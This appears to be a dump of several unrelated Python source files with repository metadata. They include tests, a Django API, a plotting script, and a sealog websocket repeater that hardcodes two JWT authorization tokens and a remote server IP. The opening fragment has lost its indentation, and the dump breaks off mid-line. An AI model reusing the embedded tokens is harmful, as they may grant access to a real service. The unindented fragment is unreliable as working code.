super(UserSubscriptionsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in xrange(3, 6)]
for collection in collections:
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.publish_collection(self.owner, collection.id)
thread_id = feedback_services.create_thread(
'exploration', 'exp_id', None, 'a subject', 'some text')
subscription_services.subscribe_to_thread(
self.user_id, thread_id)
subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
for exp in explorations:
subscription_services.subscribe_to_exploration(
self.user_id, exp.id)
for collection in collections:
subscription_services.subscribe_to_collection(
self.user_id, collection.id)
self.process_and_flush_pending_tasks()
self.job_class = (
prod_validation_jobs_one_off.UserSubscriptionsModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated UserSubscriptionsModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_get_external_id_relationship_failure(self):
nonexist_thread_id = 'nonexist_thread_id'
subscription_services.subscribe_to_thread(
self.user_id, nonexist_thread_id)
expected_output = [
(
u'[u\'failed validation check for general_feedback_thread_ids '
'field check of UserSubscriptionsModel\', '
'[u"Entity id 110211048197157141232: based on '
'field general_feedback_thread_ids having value '
'nonexist_thread_id, expect model GeneralFeedbackThreadModel '
'with id nonexist_thread_id but it doesn\'t exist"]]'),
u'[u\'fully-validated UserSubscriptionsModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
| true
| true
|
790c61e7caf3c5a4f8d9695f7cbfc3e62c4f4f4b
| 3,191
|
py
|
Python
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/archive-vfc-nfvo-catalog
|
24b92a2210c2063935d313f08e1da1e9cee45f3f
|
[
"Apache-2.0"
] | 1
|
2019-09-25T05:38:42.000Z
|
2019-09-25T05:38:42.000Z
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/archive-vfc-nfvo-catalog
|
24b92a2210c2063935d313f08e1da1e9cee45f3f
|
[
"Apache-2.0"
] | 3
|
2021-02-03T08:59:39.000Z
|
2022-03-18T02:18:12.000Z
|
catalog/packages/serializers/vnf_pkg_software_image_info.py
|
onap/modeling-etsicatalog
|
b16b4579ea80bf82fa497e4934b2bb8728845b58
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import serializers
from .checksum import ChecksumSerializer
class VnfPackageSoftwareImageInfoSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the software image.",
required=True,
allow_null=False,
allow_blank=False
)
name = serializers.CharField(
help_text="Name of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
provider = serializers.CharField(
help_text="Provider of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
version = serializers.CharField(
help_text="Version of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
checksum = ChecksumSerializer(
help_text="Checksum of the software image file.",
required=True,
allow_null=False
)
containerFormat = serializers.ChoiceField(
help_text="terminationType: Indicates whether forceful or graceful termination is requested.",
choices=["AKI", "AMI", "ARI", "BARE", "DOCKER", "OVA", "OVF"],
required=True,
allow_null=True
)
diskFormat = serializers.ChoiceField(
help_text="Disk format of a software image is the format of the underlying disk image.",
choices=["AKI", "AMI", "ARI", "ISO", "QCOW2", "RAW", "VDI", "VHD", "VHDX", "VMDK"],
required=True,
allow_null=True
)
createdAt = serializers.DateTimeField(
help_text="Time when this software image was created.",
required=True,
format=None,
input_formats=None
)
minDisk = serializers.IntegerField(
help_text="The minimal disk for this software image in bytes.",
required=True,
allow_null=True
)
minRam = serializers.IntegerField(
help_text="The minimal RAM for this software image in bytes.",
required=True,
allow_null=True
)
size = serializers.IntegerField(
help_text="Size of this software image in bytes.",
required=True,
allow_null=True
)
userMetadata = serializers.DictField(
help_text="User-defined data.",
child=serializers.CharField(
help_text="KeyValue Pairs",
allow_blank=True
),
required=False,
allow_null=True
)
imagePath = serializers.CharField(
help_text="Path in the VNF package.",
required=True,
allow_null=True,
allow_blank=False
)
| 32.896907
| 102
| 0.65246
|
from rest_framework import serializers
from .checksum import ChecksumSerializer
class VnfPackageSoftwareImageInfoSerializer(serializers.Serializer):
id = serializers.CharField(
help_text="Identifier of the software image.",
required=True,
allow_null=False,
allow_blank=False
)
name = serializers.CharField(
help_text="Name of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
provider = serializers.CharField(
help_text="Provider of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
version = serializers.CharField(
help_text="Version of the software image.",
required=True,
allow_null=True,
allow_blank=False
)
checksum = ChecksumSerializer(
help_text="Checksum of the software image file.",
required=True,
allow_null=False
)
containerFormat = serializers.ChoiceField(
help_text="terminationType: Indicates whether forceful or graceful termination is requested.",
choices=["AKI", "AMI", "ARI", "BARE", "DOCKER", "OVA", "OVF"],
required=True,
allow_null=True
)
diskFormat = serializers.ChoiceField(
help_text="Disk format of a software image is the format of the underlying disk image.",
choices=["AKI", "AMI", "ARI", "ISO", "QCOW2", "RAW", "VDI", "VHD", "VHDX", "VMDK"],
required=True,
allow_null=True
)
createdAt = serializers.DateTimeField(
help_text="Time when this software image was created.",
required=True,
format=None,
input_formats=None
)
minDisk = serializers.IntegerField(
help_text="The minimal disk for this software image in bytes.",
required=True,
allow_null=True
)
minRam = serializers.IntegerField(
help_text="The minimal RAM for this software image in bytes.",
required=True,
allow_null=True
)
size = serializers.IntegerField(
help_text="Size of this software image in bytes.",
required=True,
allow_null=True
)
userMetadata = serializers.DictField(
help_text="User-defined data.",
child=serializers.CharField(
help_text="KeyValue Pairs",
allow_blank=True
),
required=False,
allow_null=True
)
imagePath = serializers.CharField(
help_text="Path in the VNF package.",
required=True,
allow_null=True,
allow_blank=False
)
| true
| true
|
790c63efac271f58e148285b1f49e65a7b5b0f1f
| 1,945
|
py
|
Python
|
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-07-10T03:59:22.000Z
|
2021-07-10T03:59:22.000Z
|
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
jax/experimental/jax2tf/tests/tf_test_util.py
|
BuddenD/jax
|
269da0ae584cfe840f34e9f871f13c28e2772de5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from typing import Any, Callable, Tuple
import tensorflow as tf # type: ignore[import]
from jax.config import config
from jax import dtypes
from jax.experimental import jax2tf
from jax import test_util as jtu
class JaxToTfTestCase(jtu.JaxTestCase):
def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
"""Compares dtypes across JAX and TF dtypes. Overrides super method."""
def to_numpy_dtype(dt):
return dt if isinstance(dt, np.dtype) else dt.as_numpy_dtype
if not config.FLAGS.jax_enable_x64 and canonicalize_dtypes:
self.assertEqual(dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(x))),
dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(y))))
else:
self.assertEqual(to_numpy_dtype(jtu._dtype(x)),
to_numpy_dtype(jtu._dtype(y)))
def ConvertAndCompare(self, func_jax: Callable, *args,
with_function: bool = False,
atol=None,
rtol=None) -> Tuple[Any, Any]:
"""Compares jax_func(*args) with convert(jax_func)(*args)."""
func_tf = jax2tf.convert(func_jax)
if with_function:
func_tf = tf.function(func_tf)
res_jax = func_jax(*args)
res_tf = func_tf(*args)
self.assertAllClose(res_jax, res_tf, atol=atol, rtol=rtol)
return (res_jax, res_tf)
| 38.9
| 80
| 0.701285
|
import numpy as np
from typing import Any, Callable, Tuple
import tensorflow as tf
from jax.config import config
from jax import dtypes
from jax.experimental import jax2tf
from jax import test_util as jtu
class JaxToTfTestCase(jtu.JaxTestCase):
def assertDtypesMatch(self, x, y, *, canonicalize_dtypes=True):
def to_numpy_dtype(dt):
return dt if isinstance(dt, np.dtype) else dt.as_numpy_dtype
if not config.FLAGS.jax_enable_x64 and canonicalize_dtypes:
self.assertEqual(dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(x))),
dtypes.canonicalize_dtype(to_numpy_dtype(jtu._dtype(y))))
else:
self.assertEqual(to_numpy_dtype(jtu._dtype(x)),
to_numpy_dtype(jtu._dtype(y)))
def ConvertAndCompare(self, func_jax: Callable, *args,
with_function: bool = False,
atol=None,
rtol=None) -> Tuple[Any, Any]:
func_tf = jax2tf.convert(func_jax)
if with_function:
func_tf = tf.function(func_tf)
res_jax = func_jax(*args)
res_tf = func_tf(*args)
self.assertAllClose(res_jax, res_tf, atol=atol, rtol=rtol)
return (res_jax, res_tf)
| true
| true
|
790c641b1df01558b4d6684daf150ecb67a02a07
| 387
|
py
|
Python
|
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
porta/wsgi.py
|
Asisrael/examen
|
8b3c2a8c9578c5ba1d0135822df696804401f2ab
|
[
"bzip2-1.0.6"
] | null | null | null |
"""
WSGI config for porta project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'porta.settings')
application = get_wsgi_application()
| 22.764706
| 78
| 0.782946
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'porta.settings')
application = get_wsgi_application()
| true
| true
|
790c64262f02cb1d9cb0e7ff120b22923f664d0b
| 2,257
|
py
|
Python
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 4
|
2019-10-29T21:53:13.000Z
|
2021-12-02T00:38:42.000Z
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 14
|
2020-05-28T16:39:30.000Z
|
2021-05-22T06:01:40.000Z
|
misc/sealog_repeater_receive.py
|
WHOIGit/ndsf-sealog-server
|
e57843e3e23a924ccf6fc1ef1e40d92f36a3b612
|
[
"MIT"
] | 1
|
2020-01-31T00:00:42.000Z
|
2020-01-31T00:00:42.000Z
|
#!/usr/bin/env python3
# still in development
#
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
### end of repeat
except Exception as error:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
| 31.347222
| 251
| 0.692955
|
import asyncio
import websockets
import json
import requests
eventsAPIPath = '/api/v1/events'
localServerIP = '0.0.0.0'
localServerAPIPort = '8000'
localServerWSPort = '8000'
localServerPath = '/sealog-server'
localToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDE0NDE3fQ.D8ja66bnLxJ3bsJlaKRtOquu8XbibjNCyFxJpI7vafc'
localClientWSID = 'localSealogReceive'
remoteServerIP = '162.243.201.175'
remoteServerAPIPort = '80'
remoteServerWSPort = '8000'
remoteServerPath = '/sealog-server'
remoteToken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjU5ODFmMTY3MjEyYjM0OGFlZDdmYTlmNSIsInNjb3BlIjpbImFkbWluIiwiZXZlbnRfbWFuYWdlciIsImV2ZW50X2xvZ2dlciIsImV2ZW50X3dhdGNoZXIiXSwiaWF0IjoxNTI1MDEzNTUxfQ.8X-fBRUHdrwtkTLcOFAsW-vvvqCzmkZKM2gQgHNkBKk"
remoteClientWSID = 'remoteSealogReceive'
hello = {
'type': 'hello',
'id': remoteClientWSID,
'auth': {
'headers': {
'authorization': remoteToken
}
},
'version': '2',
'subs': ['/ws/status/newEvents']
}
ping = {
'type':'ping',
'id':remoteClientWSID
}
localHeaders = {'authorization': localToken}
remoteHeaders = {'authorization': remoteToken}
async def eventlog():
try:
async with websockets.connect('ws://' + remoteServerIP + ':' + remoteServerWSPort) as websocket:
await websocket.send(json.dumps(hello))
while(True):
event = await websocket.recv()
eventObj = json.loads(event)
print("eventObj:", eventObj)
if eventObj['type'] and eventObj['type'] == 'ping':
await websocket.send(json.dumps(ping))
elif eventObj['type'] and eventObj['type'] == 'pub':
r = requests.post('http://' + localServerIP + ':' + localServerAPIPort + localServerPath + eventsAPIPath, headers=localHeaders, data = json.dumps(eventObj['message']))
print(r.text)
:
print(error)
asyncio.get_event_loop().run_until_complete(eventlog())
| true
| true
|
790c659a50c3d3b7ede5f45a212e71ef09b14018
| 1,442
|
py
|
Python
|
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | 1
|
2018-11-25T20:08:48.000Z
|
2018-11-25T20:08:48.000Z
|
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | null | null | null |
Data Fusion Test/Minimos Quadrados Puro.py
|
Raphael-C-Almeida/Wireless-Sensor-Network
|
8d12b06ddec1b5f3da28fd9b94b43bc4ac4518cf
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
def gen_data(n, start=0, end=10):
x = np.linspace(start, end, n)
y = np.sin(10*x) - x*x
return y
def gen_data_osc(n):
return np.array([1024 + (-2)**(-i/100) for i in range(n)])
def gen_data_rand(n):
return np.random.randn(n) + 0.3*np.linspace(0, 10, n)
def calc_cov(X, Y):
return np.sum((X - np.average(X))*(Y - np.average(Y))) / (X.shape[0] - 1)
def angular_coef(X,Y):
return calc_cov(X,Y)/calc_cov(X,X)
def linear_coef(a, X, Y):
return np.average(Y) - a*np.average(X)
count = 100
end = 100
time = np.linspace(0, end, count)
data = gen_data(count)
delta = end / count
preds = []
kg_preds = []
kg_prediction = 0
for i in range(1, count):
a = angular_coef(time[:i], data[:i])
b = linear_coef(a, time[:i], data[:i])
prediction = (time[i]+delta)*a + b
preds.append(prediction)
avg_X = np.average(time[:i])
avg_Y = np.average(data[:i])
cov = calc_cov(time[:i], data[:i])
estimate = time*a + b
plt.scatter(time, data, label="Medições", color="#FF5850")
plt.scatter(time[1:], preds, label="Est. Min. Quad.", color="#62B21C")
plt.plot(time, estimate, label="Min. Quad. Final", color="#36A1FF")
plt.xlabel("Tempo")
plt.ylabel("Temperatura")
plt.title("Aproximação Por Minimos Quadrados")
# Place a legend to the right of this smaller subplot.
plt.legend()
plt.show()
| 24.862069
| 78
| 0.613731
|
import matplotlib.pyplot as plt
import numpy as np
def gen_data(n, start=0, end=10):
x = np.linspace(start, end, n)
y = np.sin(10*x) - x*x
return y
def gen_data_osc(n):
return np.array([1024 + (-2)**(-i/100) for i in range(n)])
def gen_data_rand(n):
return np.random.randn(n) + 0.3*np.linspace(0, 10, n)
def calc_cov(X, Y):
return np.sum((X - np.average(X))*(Y - np.average(Y))) / (X.shape[0] - 1)
def angular_coef(X,Y):
return calc_cov(X,Y)/calc_cov(X,X)
def linear_coef(a, X, Y):
return np.average(Y) - a*np.average(X)
count = 100
end = 100
time = np.linspace(0, end, count)
data = gen_data(count)
delta = end / count
preds = []
kg_preds = []
kg_prediction = 0
for i in range(1, count):
a = angular_coef(time[:i], data[:i])
b = linear_coef(a, time[:i], data[:i])
prediction = (time[i]+delta)*a + b
preds.append(prediction)
avg_X = np.average(time[:i])
avg_Y = np.average(data[:i])
cov = calc_cov(time[:i], data[:i])
estimate = time*a + b
plt.scatter(time, data, label="Medições", color="#FF5850")
plt.scatter(time[1:], preds, label="Est. Min. Quad.", color="#62B21C")
plt.plot(time, estimate, label="Min. Quad. Final", color="#36A1FF")
plt.xlabel("Tempo")
plt.ylabel("Temperatura")
plt.title("Aproximação Por Minimos Quadrados")
plt.legend()
plt.show()
| true
| true
|
790c65c42dd20d86f9f0074087714fdd05634d1a
| 2,722
|
py
|
Python
|
env/Lib/site-packages/tests/test_PR.py
|
L0dz/auto-post
|
91563235a74336e4326a13b142c05c6755e0cf47
|
[
"Apache-2.0"
] | null | null | null |
env/Lib/site-packages/tests/test_PR.py
|
L0dz/auto-post
|
91563235a74336e4326a13b142c05c6755e0cf47
|
[
"Apache-2.0"
] | 6
|
2019-12-17T13:32:08.000Z
|
2021-06-02T00:49:29.000Z
|
cineBot/lib/python3.6/site-packages/tests/test_PR.py
|
furkanalpereny/cineBot
|
cb93b6fc6ab25ba0601067f54b6824a8462f470d
|
[
"MIT"
] | null | null | null |
"""
Tests meant to be run with pytest
"""
import sys
import os
import pytest
from moviepy.editor import *
from moviepy.video.tools.interpolators import Trajectory
import sys
sys.path.append("tests")
import download_media
from test_helper import PYTHON_VERSION, TMP_DIR, TRAVIS
def test_download_media(capsys):
with capsys.disabled():
download_media.download()
def test_PR_306():
if TRAVIS:
return
#put this back in once we get ImageMagick working on travis-ci
assert TextClip.list('font') != []
assert TextClip.list('color') != []
with pytest.raises(Exception, message="Expecting Exception"):
TextClip.list('blah')
def test_PR_339():
if TRAVIS:
return
#in caption mode
overlay = TextClip(txt='foo',
color='white', font="Liberation-Mono",
size=(640, 480),
method='caption',
align='center',
fontsize=25)
#in_label_mode
overlay = TextClip(txt='foo', font="Liberation-Mono", method='label')
def test_PR_373():
result = Trajectory.load_list("media/traj.txt")
Trajectory.save_list(result, os.path.join(TMP_DIR, "traj1.txt"))
result1 = Trajectory.load_list(os.path.join(TMP_DIR,"traj1.txt"))
assert len(result[0].tt) == len(result1[0].tt)
for i in range(len(result[0].tt)):
assert result[0].tt[i] == result1[0].tt[i]
assert len(result[0].xx) == len(result1[0].xx)
for i in range(len(result[0].xx)):
assert result[0].xx[i] == result1[0].xx[i]
assert len(result[0].yy) == len(result1[0].yy)
for i in range(len(result[0].yy)):
assert result[0].yy[i] == result1[0].yy[i]
def test_PR_424():
# Recommended use
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
# Uses `col` so should work the same as above, but give warning
clip = ColorClip([1000, 600], col=(60, 60, 60), duration=10)
# Should give 2 warnings and use `color`, not `col`
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10, col=(2,2,2))
def test_PR_458():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip.write_videofile(os.path.join(TMP_DIR, "test.mp4"),
progress_bar=False, fps=30)
def test_PR_515():
# Won't actually work until video is in download_media
clip = VideoFileClip("media/fire2.mp4", fps_source='tbr')
assert clip.fps == 90000
clip = VideoFileClip("media/fire2.mp4", fps_source='fps')
assert clip.fps == 10.51
def test_PR_529():
video_clip = VideoFileClip("media/fire2.mp4")
assert video_clip.rotation ==180
if __name__ == '__main__':
pytest.main()
| 27.77551
| 79
| 0.630051
|
import sys
import os
import pytest
from moviepy.editor import *
from moviepy.video.tools.interpolators import Trajectory
import sys
sys.path.append("tests")
import download_media
from test_helper import PYTHON_VERSION, TMP_DIR, TRAVIS
def test_download_media(capsys):
with capsys.disabled():
download_media.download()
def test_PR_306():
if TRAVIS:
return
assert TextClip.list('font') != []
assert TextClip.list('color') != []
with pytest.raises(Exception, message="Expecting Exception"):
TextClip.list('blah')
def test_PR_339():
if TRAVIS:
return
overlay = TextClip(txt='foo',
color='white', font="Liberation-Mono",
size=(640, 480),
method='caption',
align='center',
fontsize=25)
overlay = TextClip(txt='foo', font="Liberation-Mono", method='label')
def test_PR_373():
result = Trajectory.load_list("media/traj.txt")
Trajectory.save_list(result, os.path.join(TMP_DIR, "traj1.txt"))
result1 = Trajectory.load_list(os.path.join(TMP_DIR,"traj1.txt"))
assert len(result[0].tt) == len(result1[0].tt)
for i in range(len(result[0].tt)):
assert result[0].tt[i] == result1[0].tt[i]
assert len(result[0].xx) == len(result1[0].xx)
for i in range(len(result[0].xx)):
assert result[0].xx[i] == result1[0].xx[i]
assert len(result[0].yy) == len(result1[0].yy)
for i in range(len(result[0].yy)):
assert result[0].yy[i] == result1[0].yy[i]
def test_PR_424():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip = ColorClip([1000, 600], col=(60, 60, 60), duration=10)
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10, col=(2,2,2))
def test_PR_458():
clip = ColorClip([1000, 600], color=(60, 60, 60), duration=10)
clip.write_videofile(os.path.join(TMP_DIR, "test.mp4"),
progress_bar=False, fps=30)
def test_PR_515():
clip = VideoFileClip("media/fire2.mp4", fps_source='tbr')
assert clip.fps == 90000
clip = VideoFileClip("media/fire2.mp4", fps_source='fps')
assert clip.fps == 10.51
def test_PR_529():
video_clip = VideoFileClip("media/fire2.mp4")
assert video_clip.rotation ==180
if __name__ == '__main__':
pytest.main()
| true
| true
|
790c65e13683bf49316ebe0a262eadf6d21d4058
| 5,280
|
py
|
Python
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | 4
|
2021-12-24T16:07:44.000Z
|
2022-03-04T02:30:20.000Z
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | 4
|
2021-12-30T13:32:56.000Z
|
2022-03-15T03:58:48.000Z
|
apps/vit/api.py
|
Visualway/Vitary
|
c7db9a25837fa7390b2177b9db48e73c6f1ab3c8
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import re
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from apps.vit.models import Vit
from apps.notification.utilities import notify
from apps.vit.utilities import find_mention, find_plustag
from .forms import VitForm
from apps.develop.backends import KeyBackend
def like(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.GET.get('vit_pk'))
if vit.likes.filter(id=request.user.id).exists():
vit.likes.remove(request.user)
vit.like_count -= 1
vit.save()
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': False}, status=200)
else:
vit.likes.add(request.user)
vit.like_count += 1
vit.save()
if vit.user != request.user:
notify(message=f"{request.user.username.title()} liked your Vit - '{vit.body}'", notification_type="like", to_user=vit.user,
by_user=request.user, link=reverse('vit_detail', kwargs={'pk': vit.id}))
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': True}, status=200)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vits(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
vits = Vit.objects.filter(Q(user=request.user) | Q(
user__profile__in=request.user.profile.follows.all()) | Q(user__profile__in=request.user.profile.followed_by.all())).order_by('-date')
return JsonResponse({'vits': [vit.to_json() for vit in vits]})
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vit(request, id):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=id)
return JsonResponse({'vit': vit.to_json()}, status=200)
except:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
@csrf_exempt
def add_vit(request):
"""
Add a new vit with API, currently image and video are not supported
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
form = VitForm(request.POST)
if form.is_valid():
vit = form.save(commit=False)
vit.user = request.user
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def edit_vit(request):
"""
Edit a vit with API
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
form = VitForm(request.POST, instance=vit)
if form.is_valid():
vit = form.save(commit=False)
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You do not have permission to edit this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def delete_vit(request):
"""
Delete a vit with API
"""
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
vit.delete()
return JsonResponse({'status': 'success'}, status=200)
else:
return JsonResponse({'error': 'You do not have permission to delete this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
| 39.111111
| 146
| 0.586174
|
import json
import re
from django.http import JsonResponse
from django.db.models import Q
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from apps.vit.models import Vit
from apps.notification.utilities import notify
from apps.vit.utilities import find_mention, find_plustag
from .forms import VitForm
from apps.develop.backends import KeyBackend
def like(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.GET.get('vit_pk'))
if vit.likes.filter(id=request.user.id).exists():
vit.likes.remove(request.user)
vit.like_count -= 1
vit.save()
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': False}, status=200)
else:
vit.likes.add(request.user)
vit.like_count += 1
vit.save()
if vit.user != request.user:
notify(message=f"{request.user.username.title()} liked your Vit - '{vit.body}'", notification_type="like", to_user=vit.user,
